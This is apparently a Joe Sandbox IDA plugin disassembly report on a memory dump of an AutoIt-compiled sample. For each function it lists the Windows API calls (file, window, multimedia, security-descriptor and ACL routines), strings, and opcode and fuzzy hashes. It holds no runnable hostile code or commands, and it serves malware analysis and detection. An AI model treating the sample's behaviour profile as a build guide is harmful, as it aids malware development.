                                    • GetCursorInfo.USER32(?), ref: 00187A7B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Cursor$Load$Info
                                    • String ID:
                                    • API String ID: 2577412497-0
                                    • Opcode ID: cc19149c8027f05aea78b0e32acf8164e02093edefa4277f39aa9628321520dc
                                    • Instruction ID: 38225add1cd6145f6d0306fc387c0ff3cdbaf4da2ee47f1f2d2ad300f584abd8
                                    • Opcode Fuzzy Hash: cc19149c8027f05aea78b0e32acf8164e02093edefa4277f39aa9628321520dc
                                    • Instruction Fuzzy Hash: A63138B0D0831A6ADB10AFB68C8995FFFE8FF04750F54452AE50DE7280DB78A5008FA1
                                    Function 0013C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0013C8B7,?,00002000,?,?,00000000,?,0013419E,?,?,?,001CDC00), ref: 0014E984
                                      • Part of subcall function 0013660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001353B1,?,?,001361FF,?,00000000,00000001,00000000), ref: 0013662F
                                    • __wsplitpath.LIBCMT ref: 0013C93E
                                      • Part of subcall function 00151DFC: __wsplitpath_helper.LIBCMT ref: 00151E3C
                                    • _wcscpy.LIBCMT ref: 0013C953
                                    • _wcscat.LIBCMT ref: 0013C968
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0013C978
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0013CABE
                                      • Part of subcall function 0013B337: _wcscpy.LIBCMT ref: 0013B36F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                    • API String ID: 2258743419-1018226102
                                    • Opcode ID: b17ff44fcd39a249cbe8083b84d9320b2e01fa9c8f8adbdb079ed9b559513ab9
                                    • Instruction ID: 5b55793159932a67a78c5fc11026fedeaaa9ec37e88e6bf5863a0b6120aa51d0
                                    • Opcode Fuzzy Hash: b17ff44fcd39a249cbe8083b84d9320b2e01fa9c8f8adbdb079ed9b559513ab9
                                    • Instruction Fuzzy Hash: 4112A1715083419FC724EF24C881AAFBBF5BFA9344F44491EF599A3261DB30DA49CB92
                                    Function 0019CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 0019CEFB
                                    • DestroyWindow.USER32(?,?), ref: 0019CF73
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0019CFF4
                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0019D016
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0019D025
                                    • DestroyWindow.USER32(?), ref: 0019D042
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00130000,00000000), ref: 0019D075
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0019D094
                                    • GetDesktopWindow.USER32 ref: 0019D0A9
                                    • GetWindowRect.USER32(00000000), ref: 0019D0B0
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0019D0C2
                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0019D0DA
                                      • Part of subcall function 0014B526: GetWindowLongW.USER32(?,000000EB), ref: 0014B537
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                    • String ID: 0$tooltips_class32
                                    • API String ID: 3877571568-3619404913
                                    • Opcode ID: 2fb2aa1de65c91f6e3fd9f84457ec958b3960a99234396ec67e3ea86f0a0e1db
                                    • Instruction ID: f35faa6f565d8dbe252123fe33f5c57e54458952abce30ebda8041042ccec08b
                                    • Opcode Fuzzy Hash: 2fb2aa1de65c91f6e3fd9f84457ec958b3960a99234396ec67e3ea86f0a0e1db
                                    • Instruction Fuzzy Hash: 8371BEB4140305AFDB24CF28EC85FB677E5EB88714F18451DF985972A1EB70E982CB22
                                    Function 0017AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(00000000), ref: 0017AB3D
                                    • VariantCopy.OLEAUT32(?,?), ref: 0017AB46
                                    • VariantClear.OLEAUT32(?), ref: 0017AB52
                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0017AC40
                                    • __swprintf.LIBCMT ref: 0017AC70
                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0017AC9C
                                    • VariantInit.OLEAUT32(?), ref: 0017AD4D
                                    • SysFreeString.OLEAUT32(00000016), ref: 0017ADDF
                                    • VariantClear.OLEAUT32(?), ref: 0017AE35
                                    • VariantClear.OLEAUT32(?), ref: 0017AE44
                                    • VariantInit.OLEAUT32(00000000), ref: 0017AE80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                    • API String ID: 3730832054-3931177956
                                    • Opcode ID: e7ac66fb119c499acc20b81778aba96246f2b80fc0d2d9843b690a2ccc6f1b4e
                                    • Instruction ID: 2a6c8083c12ef76d9493f4ec1ad23228b3a96bbdbf98b26a595e116872269a55
                                    • Opcode Fuzzy Hash: e7ac66fb119c499acc20b81778aba96246f2b80fc0d2d9843b690a2ccc6f1b4e
                                    • Instruction Fuzzy Hash: 30D11431A04205EBCB289FA5D884B6EB7B5FF84710F55C459F40D9B190DB70EC84DBA2
                                    Function 0019716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 001971FC
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00197247
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                    • API String ID: 3974292440-4258414348
                                    • Opcode ID: 44cd6b901b1ec4035f35b954b7e49980a793548537fe78b65f5f52ee4d86f1f6
                                    • Instruction ID: 67917d5202157afb8d17698119ffdd03fe035908b7d05d0e4890034f441d60c8
                                    • Opcode Fuzzy Hash: 44cd6b901b1ec4035f35b954b7e49980a793548537fe78b65f5f52ee4d86f1f6
                                    • Instruction Fuzzy Hash: 9F9160746147019BCB04EF20C891A6EB7A1BFA4314F01485DF89A6B3E3DB70ED46CB91
                                    Function 0019E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0019E5AB
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0019BEAF), ref: 0019E607
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0019E647
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0019E68C
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0019E6C3
                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0019BEAF), ref: 0019E6CF
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0019E6DF
                                    • DestroyCursor.USER32(?), ref: 0019E6EE
                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0019E70B
                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0019E717
                                      • Part of subcall function 00150FA7: __wcsicmp_l.LIBCMT ref: 00151030
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                    • String ID: .dll$.exe$.icl
                                    • API String ID: 3907162815-1154884017
                                    • Opcode ID: e3acb4fc8e4b4947d692e6a88ca9c14515c344aec7b2fa428ac02712542c21af
                                    • Instruction ID: b087245a16799e6e7dc22e0f869889730f5c14b805c8f618633b312fa79dfdc0
                                    • Opcode Fuzzy Hash: e3acb4fc8e4b4947d692e6a88ca9c14515c344aec7b2fa428ac02712542c21af
                                    • Instruction Fuzzy Hash: A761BE71900215FAEF28DF64DC46FFE7BA8BB18725F104215F915DA0D0EBB0A990CBA0
                                    Function 0017D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    • CharLowerBuffW.USER32(?,?), ref: 0017D292
                                    • GetDriveTypeW.KERNEL32 ref: 0017D2DF
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0017D327
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0017D35E
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0017D38C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                    • API String ID: 1148790751-4113822522
                                    • Opcode ID: 054f6c981fab1faf4830945eca829d359668ce3408af50ce939853b188fc81c3
                                    • Instruction ID: 6199e243bfd8b33896a44be3e44215f70b27d4e3b0b0bf7a2dd8293d40f108e6
                                    • Opcode Fuzzy Hash: 054f6c981fab1faf4830945eca829d359668ce3408af50ce939853b188fc81c3
                                    • Instruction Fuzzy Hash: E4514B71504604AFC700EF11D88196EB7F4FFA8758F00896CF89AA7261DB31EE06CB92
                                    Function 001726BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,001A3973,00000016,0000138C,00000016,?,00000016,001CDDB4,00000000,?), ref: 001726F1
                                    • LoadStringW.USER32(00000000,?,001A3973,00000016), ref: 001726FA
                                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,001A3973,00000016,0000138C,00000016,?,00000016,001CDDB4,00000000,?,00000016), ref: 0017271C
                                    • LoadStringW.USER32(00000000,?,001A3973,00000016), ref: 0017271F
                                    • __swprintf.LIBCMT ref: 0017276F
                                    • __swprintf.LIBCMT ref: 00172780
                                    • _wprintf.LIBCMT ref: 00172829
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00172840
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                    • API String ID: 618562835-2268648507
                                    • Opcode ID: 0a1949c20a1cf27e71899046cb203b82ffefe72264bf50c1fd66343854e418bb
                                    • Instruction ID: a1a29bf6622819d583dab54c244fa2f7d426127d14981a330e3a28412258b4da
                                    • Opcode Fuzzy Hash: 0a1949c20a1cf27e71899046cb203b82ffefe72264bf50c1fd66343854e418bb
                                    • Instruction Fuzzy Hash: 12411C72800219BACB14FBE0DD86EEEB779AF24740F104065F50677092EB716F59CBA1
                                    Function 0017D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0017D0D8
                                    • __swprintf.LIBCMT ref: 0017D0FA
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0017D137
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0017D15C
                                    • _memset.LIBCMT ref: 0017D17B
                                    • _wcsncpy.LIBCMT ref: 0017D1B7
                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0017D1EC
                                    • CloseHandle.KERNEL32(00000000), ref: 0017D1F7
                                    • RemoveDirectoryW.KERNEL32(?), ref: 0017D200
                                    • CloseHandle.KERNEL32(00000000), ref: 0017D20A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                    • String ID: :$\$\??\%s
                                    • API String ID: 2733774712-3457252023
                                    • Opcode ID: 703d8a07c561b9a1780af05c3f8981031ccf1a86a001365f8d3ead93e59999f1
                                    • Instruction ID: e75c9b64213b2207cc2f9a8e00d76d453cc6785b33a5037f7a3ca0c7d89a2cd7
                                    • Opcode Fuzzy Hash: 703d8a07c561b9a1780af05c3f8981031ccf1a86a001365f8d3ead93e59999f1
                                    • Instruction Fuzzy Hash: E131F4B6500109ABDB21DFA0EC48FEB37BCEF88300F1081B6F919D6161FB7096858B24
                                    Function 0019E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0019BEF4,?,?), ref: 0019E754
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0019BEF4,?,?,00000000,?), ref: 0019E76B
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0019BEF4,?,?,00000000,?), ref: 0019E776
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0019BEF4,?,?,00000000,?), ref: 0019E783
                                    • GlobalLock.KERNEL32(00000000), ref: 0019E78C
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0019BEF4,?,?,00000000,?), ref: 0019E79B
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0019E7A4
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0019BEF4,?,?,00000000,?), ref: 0019E7AB
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0019E7BC
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,001BD9BC,?), ref: 0019E7D5
                                    • GlobalFree.KERNEL32(00000000), ref: 0019E7E5
                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0019E809
                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0019E834
                                    • DeleteObject.GDI32(00000000), ref: 0019E85C
                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0019E872
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                    • String ID:
                                    • API String ID: 3840717409-0
                                    • Opcode ID: f9544027d9d458e8a5cdb1abca387dc8840c563097dac9a8ae19f520bad80c9d
                                    • Instruction ID: e1500d05a667c93a9c863146a658871372b28dac60dee956a1500872443a0256
                                    • Opcode Fuzzy Hash: f9544027d9d458e8a5cdb1abca387dc8840c563097dac9a8ae19f520bad80c9d
                                    • Instruction Fuzzy Hash: 07414975600204FFDB19DFA5EC88EAA7BB8EB89B15F104158F905D7260E7309980CB61
                                    Function 001805F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                    Download Yara Rule
                                    APIs
                                    • __wsplitpath.LIBCMT ref: 0018076F
                                    • _wcscat.LIBCMT ref: 00180787
                                    • _wcscat.LIBCMT ref: 00180799
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001807AE
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001807C2
                                    • GetFileAttributesW.KERNEL32(?), ref: 001807DA
                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 001807F4
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00180806
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                    • String ID: *.*
                                    • API String ID: 34673085-438819550
                                    • Opcode ID: 508fe1de46ec152c1242073c3a5860e7d642009ec3a918fbaa341a9ea0e696b2
                                    • Instruction ID: f44bed50e8ba3294de22afc4e0772ae2dae1c38472f413634c2b9201796cccc5
                                    • Opcode Fuzzy Hash: 508fe1de46ec152c1242073c3a5860e7d642009ec3a918fbaa341a9ea0e696b2
                                    • Instruction Fuzzy Hash: D58181715043099FCB65EF64C44596AB3E8BB99314F24482EF889D7251E730DE888F92
                                    Function 0016A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0016ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0016ABD7
                                      • Part of subcall function 0016ABBB: GetLastError.KERNEL32(?,0016A69F,?,?,?), ref: 0016ABE1
                                      • Part of subcall function 0016ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0016A69F,?,?,?), ref: 0016ABF0
                                      • Part of subcall function 0016ABBB: RtlAllocateHeap.NTDLL(00000000,?,0016A69F), ref: 0016ABF7
                                      • Part of subcall function 0016ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0016AC0E
                                      • Part of subcall function 0016AC56: GetProcessHeap.KERNEL32(00000008,0016A6B5,00000000,00000000,?,0016A6B5,?), ref: 0016AC62
                                      • Part of subcall function 0016AC56: RtlAllocateHeap.NTDLL(00000000,?,0016A6B5), ref: 0016AC69
                                      • Part of subcall function 0016AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0016A6B5,?), ref: 0016AC7A
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0016A8CB
                                    • _memset.LIBCMT ref: 0016A8E0
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0016A8FF
                                    • GetLengthSid.ADVAPI32(?), ref: 0016A910
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0016A94D
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0016A969
                                    • GetLengthSid.ADVAPI32(?), ref: 0016A986
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0016A995
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0016A99C
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0016A9BD
